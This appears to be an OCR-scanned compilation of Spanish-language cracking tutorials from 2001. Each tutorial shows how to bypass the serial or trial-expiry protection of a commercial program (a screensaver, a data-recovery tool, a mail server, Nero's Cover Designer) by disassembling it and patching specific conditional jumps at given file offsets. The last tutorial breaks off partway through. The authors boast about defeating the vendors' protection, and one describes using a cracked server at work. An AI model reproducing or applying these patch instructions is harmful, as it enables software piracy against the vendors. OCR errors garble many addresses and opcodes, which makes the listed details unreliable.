y!!! 1111111 listo programa crackeado.....ya vieron que facilon........ YA SI QUIEREN BUSCAR UN SERIAL FIJENSE EN LA DIRECCION 
DE MEMORIA :0046A454 85DS8 test eax, ebx tenemos una comparacion...mmmm interesante....inicien softice y pongan un break point 
en esa direccion de memoria y vean que contienen esos acumuladores ....... 


AHORA SI ESTE ARROZ YA SE COCIO 


SALUDOS A TODOS...... 


Nota 


Espero que les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y 
cometo errores, si encuentras uno házmelo saber OK. PROFESOR _X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 


e. Act MAgO 
. ¡TeD 


VluGo 


CrKViz 


[ DeK_OiN ] 
e Txeli 

e Kuato_Thor 
e CrkViz 

e CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 

e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 
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Programa:  Massaraksh Capital Screensaver v 5.2 


PROTECCION: Serial. 

Objetivo: Parchar el Screensaver para que acepte cualquier nombre y numero de serie 
Descripcion: Un Screensaver verdaderamente bueno, unos efectos que a mi parecer son agradables 
Dificultad: Newbie 

DOWNLOAD : http://www.controlzed.com/areality/ 

Herramientas: W32dasm, editor Hex 

CRACKER: Profesor_X FECHA: 20/02/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como encontrar un numero de serie a 
Massaraksh Capital Screensaver v 5.2, de la empresa MENTAL MOTI ONS una empresa que se especializa en 
desarrollar Screensaver y otras cuantas utilerias para windows, ........ como podran ver aumente una nueva seccion 
que se llama : VALORACION DEL SOFTWARE en la cual pondremos la calificacion que se merece segun mi punto de 
vista, tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 
2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Ahora lo primero es analizar con que esta hecho el Massaraksh Capital Screensaver v 5.2 que desde ahora lo 
llamaremos MCS, lo analizaremos con una utileria muy buena que se llama Language 2000 v4.5.1.144 el que nos 
mostrará información realmente importante para la hora de atacar el programa; bueno el Language 2000 v4.5.1.144 
nos mostrará los siguientes datos: 


| Ú For acke Ambient reality software Maszar ad ax C apita 


Massaraksh Capital.scr J 


E ¡Borland IA ss 


http: //wmm.borland. com/delphi/ 


como podemos ver en la imagen el programa esta hecho en DELPHI y no esta protegido con nada de packers 
... Mmmm interesante, jejejejjeje..ahora ya sabemos como esta todo este menjurge.....empezemos, iniciemos el 
SoftICE e instalemos el programa y nos vamos a control panel > screensaver y seleccionamos el MCS y vamos a 
la opcion de configurar y nos aparecera esta ventana: 


Register online 


Enter your registration data: 
inety of bro 


Done! 


Close 


mmmm....como podemos ver nos aparece a la mitad de la ventana unas caption box en las cuales insertaremos 
nuestro nombre y numero de serie como se ve en la pantalla, y damos click en SUBMIT y nos aparece una 
ventanita como esta: 


ok!!! ahora damos click en cancelar y como podemos ver tiene aspecto de una MESSAGEBOX mmmmmm!! 
ok! ahora damos click en aceptar y nos regresa a la pantalla de registro, despues click en DONE y nos manda 
directamente a la ventana de configuracion del Screensaver: 


Masszaraksh Capital 5,2 
UNREGISTERED COPY 


Horizontal Flip 


omo podemos ver en la parte 
superior de la ventana un string que dice UNREGISTERED COPY ....... JEJEJEJJEJ!!!! muchas formas de 
atacar....jejjejej..dejaron las puertas abiertas estos muchachos de MENTAL MOTIONS ....... ¿Ok se acuerdan del string 
que mandaba de error , ok ahora desensamblemos el Massaraksh Capital.ser , que se encuentra en la carpeta de 
windows.....una vez desensamblado, vamos a los Strings References y buscamos el String de la ventana de 
error.....FAILED TO REGISTER...BLABLABALA....y despues de un rato por fin lo encontramos 


W32Dasm List of String Data Items 


damos doble click sobre ella y nos manda a una direccion de memoria, damos otra vez doble click para ver si no hay 
alguna otra referencia a este string y parece que no hay otra....jejejjejejje!!!!....ok! ...caemos en esta parte del codigo: 


:00809F91 BA02000000 mov edx, 00000002 

:00809F96 E849760B00 call 008C15E4 

:00809F9B 66C747100800 mov [edi+10], 0008 
:00809FA 1 84DB test bl, bl 

:00809FA3 0F848E000000 je 00804037 <------ SALTOS AL MENSAJE EXITOSO 
:00809FA9 66C747102000 mov [edi+10], 0020 
:00809FAF 33C9 xor ecx, ecx 

:00809FB1 894DEC mov dword ptr [ebp-14], ecx 
:00809FB4 8DS55EC lea edx, dword ptr [ebp-14] 
:00809FB7 FF471C inc [edi+1C] 

:00809FBA 8B860C030000 mov eax, dword ptr [esi+0000030C] 
:00809FCO E817160600 call 0OS6BSDC 

:00809FC5 8D4DEC lea ecx, dword ptr [ebp-14] 
:00809FC8 33D2 xor edx, edx 

:00809FCA 8B01 mov eax, dword ptr [ecx] 

:00809FCC 50 push eax 

:00809FCD 8955E8 mov dword ptr [ebp-18], edx 
:00809FDO FF471C inc [edi+1C] 

:00809FD3 8D55E8 lea edx, dword ptr [ebp-18] 
:00809FD6 8B 8608030000 mov eax, dword ptr [esi+00000308] 
:00809FDC E8FB 150600 call 0O86B5DC 

:00809FE1 8D4DES8 lea ecx, dword ptr [ebp-18] 
:00809FE4 8B01 mov eax, dword ptr [ecx] 

:00809FE6 50 push eax 

:00809FE7 ESBOB9FFFF call 0080599C 

:00809FEC 83C408 add esp, 00000008 

:00809FEF 85CO0 test eax, eax 

:00809FF1 0F94C2 sete dl 

:00809FF4 83E201 and edx, 00000001 

:00809FF7 8D45E8 lea eax, dword ptr [ebp-18] 
:00809FFA 52 push edx 

:00809FFB BA02000000 mov edx, 00000002 

:0080A000 FF4F1C dec [edi+1C] 

:0080A003 E8DC750BO0O0 call 008C15E4 

:0080A008 FF4F1C dec [edi+1C] 

:0080A00B 8D45EC lea eax, dword ptr [ebp-14] 
:0080A00E BA02000000 mov edx, 00000002 

:0080A013 E8CC750B0O0 call 008C15E4 

:0080A018 59 pop ecx 

:0080A019 85C09 test ecx, ecx 

:0080A01B 741A je 00804037 <------ SALTOS AL MENSAJE EXITOSO 
:0080A01D A1A0949100 mov eax, dword ptr [009194A0] 
:0080A022 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Error" 


| 
:0080A024 B9F0D39000 mov ecx, 0090D3F0 


* Possible StringData Ref from Data Obj ->"Failed to register Massaraksh. " 
->"The registration code you have " 
->"entered is not correct." 


:00804029 BA9AD39000 mov edx, 0090D39A <-----CAEMOS AQUI 
:0080A02E 8B00 mov eax, dword ptr [eax] 

:0080A030 E82B750B0O0 call 008C1560 

:0080A035 EB2E ¡mp 0080A065 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:00809FA3(C), :0080A01B(C) 

| 

:0080A037 A1A0949100 mov eax, dword ptr [009194A0] 

:0080A03C 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"OK" 


| 
:0080A03E B932D49000 mov ecx, 0090D432 


* Possible StringData Ref from Data Obj ->"You have successfully registered " 
->"your Massaraksh. Enjoy it!" 

| 

:0080A043 BAF6D39000 mov edx, 0090D3F6 

:0080A048 8B00 mov eax, dword ptr [eax] 


Como podemos ver caemos en 00804029 y si vemos una lineas hacia abajo vemos el mensaje de registro 
exitoso..referenciado con dos saltos condicionales......hechemosle un vistazo a esos saltos condicionales. 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:00809FA3(C), :0080A01B(C) 


00809FA3 0F348E000000 je 00804037 <--.--- SALTOS AL MENSAJE EXITOSO 
:0080A01B 741A je 00804037 <cmm.-- SALTOS AL MENSAJE EXITOSO 


Lo que debemos hacer es cambiar esos saltos para que siempre salten al mensaje Exitoso...como? pues facil faci!l..... 
nos posicionamos en cada linea donde estan los saltos y sacamos su offset los cuales son: 


0080A01B = 961B 

00809FA3 = 95A3 

abrimos el screensaver en el editor hexadecimal y vamos a cambiar los saltos 
741A por EB1A 

y 

0F848E000000 por 0F858E000000 


salvamos los cambios e insertamos nuestro nombre y numero de serie cualquiera ...y!!!!1!!! PROGRAMA 
REGISTRADO....... JEJEJEJJEJEJ!!!! OTRO MAS QUE MUERDE EL POLVO!!! 


ANTOHER ONE BITES THE DUST.....! 111 


SALUDOS A TODOS... 


Nota 


Espero que les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking....Soy humano y cometo 
errores, si encuentras uno házmelo saber OK. PROFESOR _X 


Saludos 


e. Act MAgO 


. ¡TeD 

e VluGo 

e [DeK_OiN ] 
e Txeli 

e Kuato_Thor 
e CrkViz 

e CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 


e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ /www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Recover 4 All 

PROTECCION: Serial. 

Objetivo: Simular Estar Registrado 

Descripcion: Recuperación de datos perdidos 

Dificultad: Newbie 

DOWNLOAD: http://www.magellas.com/ 

Herramientas: Softlce, W32DASM, Heditor Exadecimal. 

CRACKER: Nopper FECHA: 20/02/2001 
INTRODUCCION 


Bueno pues después de echar un vistazo al programa vemos k este share no tiene limitación de tiempo de uso, pero en 
cambio si k nos limita el tamaño de los archivos k podemos recuperar a tan solo 10 Kb además de mostrarnos una fea 
nag cada vez k se ejecuta 

El registro se lleva a cabo mediante un serial, pero depués de intentar atakarlo sin éxito recurrí al método del parcheo. 
Veamos como llegué a la solución. 


AL ATAKE 


En estos casos lo mas normal es pensar k el programador usa un flag para indicar si el producto esta registrado 
o por el contrario no lo está. Buskemos entonces alguna aproximación k nos acerke a al código donde se procesa 
este flag. Vayamos a W32DASM a ver si las strings nos dan alguna pista, al parecer hay algunas bastante 
interesantes como es ''Program is unregistered'', veamos a donde nos lleva esa string: 


:0040B17C 85C0 test eax, eax 
:0040B17E 7523 jne 0040B1A3 


* Possible StringData Ref from Data 0bj ->"Program is unregistered" 


Pues si os fijais en ese mov eax, dword ptr [edx+00005238] tiene toda la pinta de ser el flag de control además el 
testeo y el posterior salto condicional lo corroboran, vayamos ahora a SICE y carguemos a nuestra víctima y 
pongamos un break en esa dirección: bpx 0040B176 

Una vez haya roto SICE veamos k dirección de memoria es realmente edx+00005238: d edx 0040b176 


Esta resulta ser: 0167:007BA88C 

Pues con esta información ya solo nos keda saber en k punto es cambiado el valor k guarda esa posición de 
memoria, el salto condicional k vimos antes era de tipo jnz, es decir, k saltaba si el el valor no era cero, y al 
saltar evitaba la string de ''no registrado" por lo tanto con casi toda seguridad un valor de 1 en el flag kerrá 
decir k si estamos registrados. Volvamos a cargar a la víctima en el SICE y pongamos ahora un break de 
memoria para ver cuando está el programa accediendo a el flag: bpm 0167:007BA88C 

Ahora veremos k rompe en 0040b3BF, pero esta dirección no es realmente interesante ya k si miramos el código 
por encima veremos k no se hace referencia a ninguna instrucción k cambie el valor del flag, asi k seguramente 
en este punto lo único k se hace es incializar ese espacio de memoria. Al seguir la ejecución con F5 veremos k 
vuelve a romper esta vez en 0040B40E y fijaos k esta dirección si k es interesante ;) 


:OO40B3E5 7406 je 0040B3ED 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
|:0040B3E0(C) 

l 

:DO40B3E7? 89B538520000 mov dword ptr [ebp+00005238], esi 


Veis esi ? está siendo volcado a nuestro flag!!! jeje lo pillamos, ahora si traceamos un poco por esa trozo de 
código veremos k lo k hace ese mov es volvar el valor 1 (a donde apunta esi ) a nuestro flag por lo tanto lo único 
k debemos hace para k se ejecute ese mov k tanto nos interesa es capar el salto k tiene encima en 0040B3E5 con 
un par de nops y problema resuelto :) 


0000B3DC 05 39 5D 68 75 05 39 5D 50 ENBEENS — -9]'u.9]ADH 
SO000B3ES B5 38 52 3B 03 74 17 39 5D 68 p8R..;At.9]' 
999BB3FA 75 12 39 5D 5C 75 8D 53 6A 38 68 C8  u.9]tu.Sjohb 
00008400 D2 44 00 ES DE 44 02 00 8B 85 38 52  0D.BbD..MNSR: 


Ahora el programa está totalmente registrado sin limitaciones ni nags. 


Por último decir k un atake mas elegante hubiese sido ir a por el serial pero si no podeis con éste el uso del 
parcheo tambíen nos pude dar un buen resultado. 


SALUDOS: 
Gracias a toda la peña del Ffcrackers del hispano, a WKT por ser tan cojonudos, a Karpoff por ser una makina 
incasable ( sigue asi tio ), a toda la gente de Turotiales2000 y a ProfesorX por dejarse el alma en la escena 


cracker. Y gracias a tí k estas leyendo esto!!! espero k te sea útil. 


Nopper. 2001. 


Noprer 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: S-MAILSERVER 2.0 


PROTECCION: Limitacion de Tiempo, serial 

Objetivo: Buscar un Numero de Serie valido o parchar el Programa para ser usuario registrado 

Descripcion: Servidor de correo interno ¿Alguien puede decirme como se configura ?, por favor 

Dificultad: Newbie 

DOWNLOAD: http: //www.simedia.es 

Herramientas: W32dasm, Editor HEx 

CRACKER: cap_kirk69 FECHA: 20/02/2001 
INTRODUCCION 


Hola a todos , este es mi segundo tutorial y espero que no sea el ultimo. Despues de pasar todos los partes de trabajo de mi 
empresa , pues....... como que estas un poco harto y le ha tocado hoy al servidor de correo interno , que no lo tengo puesto porque 
no se todavia como se configura , pero no importa ya no me molestan los 30 dias de prueba. 


AL ATAKE 


FUEGO EL 1 


BIEN YA LO HEMOS DESCARGADO DE LA WEB Y NO PONEMOS A INSTALARLO, Y EN LA INSTALACION NOS DA DOS OPCIONES 
UNA ES INSTALARLO CON SU NUMERO DE SERIE Y LA OTRA ES EN MODO DEMOSTRATIVO. 


NOSOTROS LO VAMOS A INSTALAR EN MODO DEMOSTRATIVO CON LO CUAL NOS VA A DAR 30 DIAS DE PRUEBA ,UNA VEZ YA 
INSTALADO ADELANTAMOS EL SISTEMA UN PAR DE MESES... Y AL EJ ECUTAR EL PROGRAMA. NOS DICE: S-MAIL SERVER 2.0 
HA CADUCADO , PUES ESA INFORMACION QUE NOS DA EL CUADRO DE DIALOGO , LA APUNTAMOS POR QUE POR AHI VA A 

VENIR NUESTRO ATAQUE. 


DESPUES TENDREMOS LA OPCION DE REGISTRARNOS , YA QUE HAY UN Ej] ECUTABLE QUE NOS DA ESA POSIBILIDAD. 


PRIMERO LO ANALIZAMOS CON EL FI LEI NSPECTOR CREACI ON DE VI PER Y VEMOS QUE ESTA HECHO CON VISUAL C++ 
DE MOCOSOFT Y QUE NO ESTA EMPACADO, BUEEENO CARGAMOS EL W32DSAM Y NOS VAMOS A STRN-REF Y PULSAMOS 
PARA VER LA REFERENCIAS EXTERNAS DEL PROGRAMA VAMOS DANDOLE HACIA ABAJO AL SCROLL Y NOS SALE ESTO 


ijectO02: .rdata EVA: 00029000 Offset: 00029000 Size: 0O000A000 Flags: 40000040 


iajectO04: .rsrc RVA: 00034000 Offset: 00036000 Size: 00004000 Flags: 40000040 


W32Dasm List of String Data Items Al ES 
HHHH+ To Search Disassembly for String Data, Double Click on Text Cancel Search 


"Router_Table" 


"Servicesáctive" 
HERA "Simedia SUM" 
"sinnombre'" 
zx of |'s-mailServer 2.0 ha caducado (%:s] 
¿"s-mallserver 2.0 ha caducado" 
Dis |'s-mailServer 2.0" 
oo1  |'s-mailServer20" 
o0z | SOFTWAREASimediaWSUMiPreferences!" ES] 
Dis | Starting Simedia SUM Service" 
001 "Stopping Simedia SUM Service" 
002 "SUM service initialization failed: " 
das "SUM service stop failed: " | 
CSS" 
004 ["sySTEMiCurentControlSetíServicesiBrowseríPara" 
DOS ["SsySTEMiCurrentControlSetiServicesiTcpipiParame" 
"SYSTEM! CurrentControlSet Services W*DAMSTCP" y] 
+++ 


Close | Copy áll Copy View 


aport Module 001: KERNEL32.d11 
aport Module 002: USER32.d11 


PUES PULSAMOS SOBRE ESTA REFERNCIA VARIAS VECES, Y VEMOS QUE NADA MAS QUE NOS LLEVA UNA VEZ, A UNA PARTE 
DEL CODIGO DEL PROGRAMA Y VEMOS ESTO 


* Referenced by a (U)lnconditional or (Cjonditional Jump at Address: 
| 200402442 1C) A REFERENCIA CONDICIONAL 

l 

200402403 6A00 push 00000000 

:D004024CA 6A00 push 00000000 


* Possible StringData Ref from Data 0bj ->"s-mailServer 2.0 ha caducado” cu CAFRMOS AQUÍ 
l 


:004024CC 6830334300 push 00433330 

:004024D1 ESS0140200 call 00423956 

:004024D6 8B4C240C mov ecx, dword ptr [esp+0C] 
:004024DA 5E pop esi 

:004024DB 648290D00000000 mov dword ptr fs: [00000000], ecx 
:004024E2 830414 add esp, 00000014 

:004024E5 C20400 ret 0004 


BUENO PUES APUNTAMOS ESA REFERENCIA CONDICIONAL EN UN PAPELITO...... Y LE DAMOS AL BOTON DE GOTTO CODE 
LOCATION Ó SHI F+F12 Y PONEMOS ESA DIRECCION ¿QUE CUAL? PUES: 00402442 Y NOS LLEVARA A ESTE SITIO: 


:00402438 56 push esi 

:00402439 SBF1 mov esi, ecx 

:0040243B ESco300000 call 00405500 

E AIM BIEN LA REFERENCIA CONDICIONAL — y 
NOS LLEWA A ESTE SALTO , QUE Sl 

200402448 A16C374300 mov eax, dword ptr [00433760] MIBAMOS EL CODIGO POR 

:0040244D 89442404 mov dword ptr [esp+04], eax ALREDEDOR SE SUPONE QUE ES La, 

200402451 8B4C241C mov ecx, dword ptr [esp+1C] TÍPICA CALL QUE HACE LA 

:00402455 8D542404 lea edx, dword ptr [esp+04] COMPROBACIÓN , TESTEA EN ESx 

:00402459 51 push ecx QUE Há CADUCADO Y EL SALTO NOS 


MANDA A LA VENTANA DE QUE HA 
* Possible StringData Ref from Data 0bj ->"s-—-mailServer 2.0 ha cad CáDUCADO 
l 
:00402454 6870334300 push 00433370 


“ARANSATrn ra mada 


PUES COJONUDO PARCHEO EL SALTO CAMBIANDO EL 
:00402442  0F8580000000 JNE  004024C8 
POR 
:00402442 E981000000 JMP 004024C8 
QUE COMO Y PORQUE HAY QUE PONER ESO , UN POCO MAS ABAJO OS LO EXPLICO. 


BIEN UNA VEZ LLEGADOS A ESTE PUNTO RECAPILULEMOS UN POCO. HEMOS SACADO EL PARCHE QUE CREEMOS QUE 
NECESITAMOS, PARA CUANDO LO PARCHEEMOS CON EL HEXWORKSHOP, Y Ej ECUTEMOS NUESTRO PROGRAMA NO NOS 
SALGA LA VENTANITA DICIENDO QUE EL PROGRAMA ESTA CADUCADO. BUENO NOS VAMOS AL HEXWORKSHOP BUSCAMOS EL 
OFFSET (MAS ABAJ O DESCRI BI RE COMO SE SACA EL OFFSET) Y PARCHEAMOS CON LOS DATOS QUE NOS HA DADO EL 

DEBUG DEL W32DSAM 


JODER S-MAIL SERVER HA CADUCADO 
NADA NO HEMOS HECHO NADA 


BUENO RESTAURAMOS EL EJECUTABLE PARCHEADO POR EL ORIGINAL QUE PREVIAMENTE LE 
HABREMOS HECHO UNA COPIA. 


BUENO COMO MIS CONOCIMIENTOS DE ENSAMBLADOR SON NULOS LO PONGO EN AMARILLO PARA AQUELLOS QIE PIENSEN 
QUE SIN SABER ASM (ENSAMBLADOR ) NO TIENE NADA QUE HACER ...... PUES NO, A LEER TODO LO QUE OS CAIGA EN LA 
MANO Y SEGURO QUE PUEDES HACER ALGO , SEGUIMOS, COMO OS DIJE ANTES MAS ARRIBA EL PROGRAMA TIENE UN 
Ej ECUTABLE QUE NOS DA LA OPCION DE REGISTRARNOS MEDIANTE UN SERIAL , PUES VAMOS ALLA YO EN MI CASO PUSE 
1111 COMO SERIAL LE DAS A SIGUIENTE 'CREO' Y OSTIAS SE CIERRA LA VENTANA SIN DECIRNOS NADA , AVER AVER ESTOS 
CHICOS MALOS DE SI MEDIA HAN PENSADO UN POCO EN NOSOTROS PERO NOSOTROS SOMOS MAS Y MEJORES QUE ELLOS 
PUES BUENO VAMOS A EJ] ECUTAR EL PROGRAMA Y NOS SALE ESTO 


SM20SERYICE 


IN s-mailServer 2.0 El código de serie no es adecuado 


FUEGO EL 2 


BUENO..BUENO...BUENO.. LO MISMO DE ANTES APUNTAMOS LO QUE NOS DICE Y AL W32DSAM , STRN-REF Y VAMOS 
BUSCANDO HASTA QUE VEMOS ESTO... "CURIOSO" 


2 UURULO4AA OIDIALCALO mov avora prr [|esptioój], esp 


:00402B4E 50 push eax 

:00402B4F ESDF9A0100 call 00410633 

:00402B54 SBCD mov ecx, ebp 

:00402B56 ES9S5F9FFFF call 004024FO 

:00402B5B 83F809 cmp eax, 00000009 

:00402B64 6202 push 00000002 

:00402B66 51 push ecx 

:00402B67 SBCC MOV ecx, esp 

:00402B69 8964241C mov dword ptr [esp+1C], esp 


* Possible StringData Ref from Data 0bj ->"El c" 
| 
:00402B6D 6804344300 push 00433404 
:00402B7?Z2 ESBS59DO100 call 0041C92C 
Ea /32D asm List of String Data Items Al E 
:00402 


:00402 — ToSearch Disassembly for String Data, Double Click on Text Cancel Search 


200402 


* Poss 


"Creado el servicio s-mailServer " 
"DisableT hreadLibraryCalls"" 
“edit 


200402 
200402 
200402 
- reses 


"El proceso no ha podido registrarse " 


A A TE 


PUES A PULSAR 2 VECES Y SOLO HAY UN SITIO DONDE NOS LLEVE QUE ES ESTE. COMO VEREIS EN UN LISTADO MUERTO 
COMO NOS DA EL W32DSAM , NORMALMENTE LAS COSAS SE E] ECUTAN DE ARRIBA HACIA ABAJO AUNQUE A VECES NO, PERO 
ESTE NO ES EL CASO . PUES VAMOS MIRANDO HACIA ARRIBA Y A MI LO UNICO QUE SE ME OCURRE ES QUE EL SALTO ESTE 
:00402B5E 0F845B050000 JE 004030BF DESPUES DE UNA CALL Y UN CMP EAX , 00000009 PUES ES EL SALTO 
NUESTRO QUE SI LO CAMBIAMOS NOS ACEPTARA CUALQUIER NUMERO DE SERIE QUE LE METAMOS. MANOS A LA OBRA . 


APUNTAMOS LA DIRECCION DEL SALTO QUE ES :00402B5E Y NOS VAMOS AL DEBUG DEL W32DSAM AHI VEREIS QUE SALEN 
UN PAR DE PANTALLAS MAS Y QUE NO ENTENDEMOS UN CARAJO PERO NO IMPORTA LO QUE NECESITAMOS ES BUSCAR UN 
BOTON QUE PONE GOTTO ADDRESS Y PULSAMOS AHI Y PONEMOS LA DIRECCION DEL SALTO EN LA VENTANITA QUE NOS 

SALE , LA DIRECCION ES ESTA :00402B5E Y LE DAMOS A ENTER. BIEN YA VEMOS QUE EL CURSOR DEL W32DSAM ESTA 
POSICIONADO EN NUESTRO SALTO AHORA LE VAMOS A DAR AL BOTON DE PATCH CODE Y NOS VA A SALIR ESTO 


A A a O a ias bd | 


133 ES1A920100 call 0041BD52 | 


W32Dasm Code Patcher Message: Instruction OK Aa E 
Pg 42 EIP Current Instruction at ElP 


EE [o0s02B5E [32 004030BF 
BDF i Enter New Instruction Below 


EE [5mp 004030b £ +] 


ota Code Patch Listing Copy | 


A MI SE ME OCURRE QUE CAMBIANDO EL J E QUE SIGNIFICA( SALTA SI ES IGUAL Ó SI ES CERO )PONER UN J MP QUE ES 
UN SALTO INCONDICIONAL QUE SALTARA SI EMPRE SIN TENER EN CUENTA LOS VALORES DE LA CALL QUE CREO 
QUE ES DONDE SE GENERA EL NUMERO DE SERIE Y EN EAX DONDE MANDA BIEN 1 Ó O DEPENDIENDO DEL RESULTADO DE LA 
CALL, (1) NO SALTES Y SIGUE ADELANTE (0) SALTA Y PON LA VENTANITA DE CODIGO INCORRECTO BUENO DONDE PONE 


ENTER NEW INSTRUCTI ON BELOW PONEMOS J MP 004030BF Y LE DAMOS A E NTE Ry NOS SALE ESTO 


"IA 4 
4/32Dasm Code Patcher Message: Instruction OK Aa 3 
> EIP Current Instruction at ElP 
A foos0zB63 [ada byte ptr [edx+02], ch 
ñ Enter New Instruction Below 
y | y 


a Code Patch Listing Copy 
> 


1) ]:0040Z2B5E E295C050000 jmp 004030BF 
L 
x 


YA LO TENEMOS NUESTRAS NUEVAS INSTRUCCIONES SON ESTAS 
:00402B5E  E95C050000 JMP  004030BF 
LAS APUNTAMOS EN EL PAPELITO Y BUSCAMOS EL OFFSET DEL SALTO SIN PARCHEAR QUE ERA 
:00402B5E 0F845B050000 JE 004030BF 


Y ESTE ES SU OFFSET QUE ESTA EN LA BARRA DE ABAJO DEL TODO DEL W32DSAM 


[ Line:3358 Pg 42 of 1113 Code Data (2:00402B5E GOffset ODOO2B5Eh in File:SM20Service.exe 


LOS CEROS DEL PRINCIPIO NO NOS VALEN Y LA HACHE ( H ) FINAL TAMPOCO , SOLO LOS NUMERO Y LETRAS QUE 

SERIAN ( 2B5E ) LA APUNTAMOS CERRAMOS EL W32DSAM Y ABRIMOS EL HEXWORKSHOP ( EDITOR HEXAGESIMAL ) CADA 

CUAL QUE ABRA SI EDITOR FAVORITO Y NOS VAMOS A ESE OFFSET Y HACEMOS LOS CAMBIOS QUE PREVIAMENTE NOS 
DIO EL W32DSAM QUE SI NO LO RECUERDAS ERAN ESTOS E95C050000 


SOLO ESO ES LO QUE NOSOTROS CAMBIAMOS , ES DECIR LO QUE NOS SALGA EN EL EDITOR 
HEXAGESIMAL UNA VEZ QUE LOCALICEMOS EL OFFSET NOS LLEVARA EL CURSOR A UN SITIO 
PUES A PARTIR DE AHI VAMOS CAMBIANDO LOS BITS QUE HAYAN POR LOS NUEVOS CON 
CUIDADITO DE NO EQUIVOCARSE , GUARDAMOS 


—> s-mallServer 2.0 


Sistema de Mensajería Unificada 
(c] 2000 Simedia S.L. 


1¡¡ FUNCIONA !!! 
TOCADO Y HUNDIDO 


FINALIZANDO 


BUENO PUES YA HEMOS ACABADO LOS DEBERES DE HOY. 


QUIERO DAR LAS GRACIAS AL PREFESOR_X POR HABERME MANDADO SU WI NI CE.DAT Y POR AGUANTARME POR 
LAS TARDES DE VEZ EN CUANDO Y A VIPER PORQUE LE HE ROBADO LA PLANTILLA Y CON ELLA ESTA HE HECHO 
ESTE TUTORIAL , ESPERO QUE LE SIRVA A ALGUIEN DE REFERENCIA. 


GRACIAS A TODOS. 


SUGERENCIAS, RECLAMACIONES ETC cap_kirk69hotmail.com 


ESTE TUTORIAL ES SOLO PARA USO EDUCACIONAL , SI TE GUSTA EL PROGRAMA COMPRALO. 
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Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 
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WavE editor y cover designer de Nero 
5:9:.03 


Programa: 


PROTECCION: Limitación de tiempo 

Descripción: Editor de Audio y genrador de caratulas de CD's 
Dificultad: | Muyyy Principiante 

DOWNLOAD: http://ww.nero.com/ 

Herramientas: M32dasm Editor Hexadecimal 

CRACKER: ADeeJay” FECHA: 21/03/2001 


| INTRODUCCION 


Tutorial de Crackeo Para Newbies 


Hola a todos; 


Ya hacia mucho que nos preparaba un manualillo, este la verdad es que es de lo mas fácil que he pillao, pero para 
los que se inician viene bien por que es tan sencillo que comprenderán el proceso a seguir para poder invertir el 
código muy fácilmente. 


También saludar a Karpoff, por su gran trabajo, y killo disculpa que no te mande nada es que no veas el curro que 
tengo... puffff, hago cosillas pero no tengo tiempo de hacer los manuales, ya te iré informando.... 


Descripción 


Bueno en el estudio del VCD, y como crearlos (por ej para copiar DVD), me hacia falta un programa que hiciese 
menú, encontré el Nero Burning 5.5.0.3 que tiene esta posibilidad, la versión que encontré no necesita número de 
serie ya que es retail, pero trae unas herramientas que tienen limite de uso, me refiero al Cover Desing y al Wave 
Editor, un generador de portadas para CD's y un editor de audio Wav, pésimo por cierto. 


Bien, estos programas una vez pasado el tiempo de prueba dejan de funcionar.... vamos a atake... 


AL ATAKE 


Cover Design de Nero 5.5.0.3 


Como siempre saca una copia de seguridad del ejecutable en este caso CoverDes.exe. 


Con nuestro programa caducado de fecha, ejecutamos el fichero CoverDes.exe, y nos sale una 
bonita ventada diciendo: 
Your demo version has expired! 


Vamos que se nos a pasao el tiempo de uso, vale abrimos el W32Dasm y cargamos el fichero 
CoverDes.exe. 


S 
Pulsamos el botón find text y escribimos en el Your demo, veremos que aparecemos aquí: 


Por si acaso lo comprueba que mas sitios , pulsamos buscar siguiente, y vemos que no, solo lo comprueba una vez. 
Vale, mirando el montón de letras y números que aparece, pensamos que podemos hacer para que siga adelante, y 
vemos que lo único que hay que hacer es impedir que llegue a leer la linea 004034C6, y ¿como lo hacemos?, bueno si 
miramos un poco mas arriba vemos en la linea 004034C0, hay una comparación, jne que nos salta justo debajo del 
código que queremos que no lea, pues ya sabemos lo que tenemos que hacer, que salte siembre, osea obligar con un 
EB, si te fijas el hexadeciam de esa linea es 7526, 75=jne (salta si no igual), y tenemos que cambiarlo por EB26, 
EB=Salto incondicional. 


Abrimos el editor, en este caso HEXedit, pero te vale cualquiera, cargas el fichero CoverDes.exe, ahora si te fijas en la 
parte de abajo del W32Dasm te pone el Offset, osea el punto al cual tienes que dirigirte para encontrar exactamente ese 
código. 


A A pu da Sd Si a o A o 


En mi caso 000034C0, vamos al editor y pulsamos ALT+FS5, que es igual que buscar offset, e introducimos el offset, 
aparecemos en el código. 


